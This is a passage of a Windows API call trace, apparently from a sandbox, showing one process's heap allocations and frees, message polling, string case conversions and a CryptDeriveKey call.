[0242.757] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0242.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0242.757] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0242.758] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.758] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0242.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0242.758] CryptDeriveKey (in: hProv=0xad2a50, Algid=0x6601, hBaseData=0xaa57e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0242.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0242.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0242.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0242.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0242.760] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0242.760] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.760] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0242.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0242.761] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.761] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0242.761] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0242.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0242.761] CryptDestroyHash (hHash=0xaa57e0) returned 1 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0242.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0242.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0242.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0242.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0242.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0242.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0242.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0242.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0242.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0242.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0242.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0242.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0242.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0242.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.768] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 